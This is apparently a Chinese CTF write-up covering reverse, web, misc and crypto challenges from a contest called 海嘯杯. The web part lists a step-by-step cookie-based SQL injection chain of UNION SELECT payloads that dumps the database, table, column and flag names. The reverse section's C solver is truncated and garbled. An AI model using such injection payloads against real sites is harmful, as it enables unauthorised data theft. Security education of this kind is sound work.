海嘯杯部分題目write up

2021-09-28 20:59:53 字數 2316 閱讀 6714

海嘯杯web

海嘯杯misc

海嘯杯cryptography

開啟string window即可檢視

按f5檢視**

開啟看到有這麼一串字元

再次點開puts裡面的引數

說明!strcmp(v1, v0)的值要為1,然後strcmp函式為0的時候,裡面的v1=v0

已知v0的值是:kanlxvdztljytfyteuor ,現在就求v1的值(即a1)

其中0xc表示十六進製制,十進位制是12,異或符的運算如下圖,12異或12等於0,0異或乙個數還是本身,所以就可以把等式左邊的^12消去。然後寫乙個c指令碼就可以得到flag

#include

"stdio.h"

void

main()

for(i=

0;i<

20;i++

)}

開啟網頁看到

應該是要偽造ip和未受權訪問,輸入

即可得到flag

首先抓包,發現cookie的引數base64編碼點奇怪

url解碼然後base64解碼後發現是1,很明顯的cookie注入。

1'order by 2 --查出欄位為2

-1'union select 1,2 --查出顯位為2

-1'union select 1,database()--查出資料庫庫名為ctf

-1'union select 1,(select table_name from information_schema.tables where table_schema='ctf' limit 0,1) --查出表名為flag

-1'union select 1,(select column_name from information_schema.columns where table_schema='ctf' and table_name='flag' limit 0,1) --查出欄位名分別為id和flag

-1'union select 1,(select flag from ctf.flag limit 0,1) --查出資料flag

注意語句後面不要寫成--+而是--,因為+是url的編碼,+原本就是空格。

base64解碼

import base64

f =open

(r'flag.txt'

,'r'

)s = f.read(

)f2 =

open

(r'flag.png'

,'w'

)flag =

str(base64.b64decode(s)

)f2.write(flag)

f2.close(

)f.close(

)

執行一下這個python指令碼即可得到flag

用binwalk分離一下即可得到隱藏的檔案

)}往前偏移3位,再base64解碼即可得到flag

柵欄密碼,找個**直接解開

攻防世界Reverse題目writeup

小白最近做了一些reverse題目,整理整理 import base64 defencode message s for i in message x ord i 32 x x 16 s chr x return base64.b64encode s correct xlnkvmtui1mgxwbz...

攻防世界WEB部分write up

新手入門區域 1.command execution 小寧寫了個ping功能,但沒有寫waf,x老師告訴她這是非常危險的,你知道為什麼嗎。wp 輸入127.0.0.1 ls,發現可執行後面的ls,故直接用find命令查詢 127.0.0.1 find name flag 看到 home flag.t...

BXS入門賽部分writeup

前言 沒有聽魚哥的話,事先沒有裝好環境,於是開始沒做出來,然後全程在裝pwntools,經過一番努力,失敗了0.0 最終在網上搜了一段python socket連線指令碼,終於可以做題了 哭 這是乙個盲打,向服務端傳送一定長度的字串,服務端就會給你最喜歡的flag.寫下指令碼嘗試需要多長的字元才可以...